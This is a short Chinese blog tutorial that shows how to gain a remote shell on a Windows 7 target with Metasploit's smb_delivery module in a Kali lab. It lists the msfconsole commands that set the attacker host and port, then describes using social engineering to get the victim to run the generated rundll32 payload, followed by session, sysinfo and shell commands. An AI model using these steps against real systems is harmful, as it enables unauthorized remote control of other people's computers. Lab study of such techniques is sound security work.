MENU

用DLL文件黑掉远程Windows PC

August 8, 2016 • Security

这个模块服务payload通过SMB服务实现并且提供命令检索和执行生成的payload。目前支持DLL和Powershell。

利用目标:Windows 7

环境需求:

攻击机:kailLinux
靶机:windows 7

打开kali终端输入msfconsole

1.jpg

然后输入

use exploit/windows/smb/smb_delivery
msf exploit (smb_delivery)>set srvhost192.168.1.101 (IP of Local Host)
msf exploit (smb_delivery)>set srvport 445
msf exploit (smb_delivery)>exploit

现在,我们已经用社会工程学的办法将生成的rundll32.exe拷贝到靶机上并运行。然后我们就获得了靶机的权限了。

2.jpg

先我们输入session –i 来打印靶机连接过来的session。

现在这个seesion已经使用sysinfo来获得系统的信息,然后输入shell来获取靶机的命令行窗口。

Tags: msf
Archives QR Code
QR Code for this page
Tipping QR Code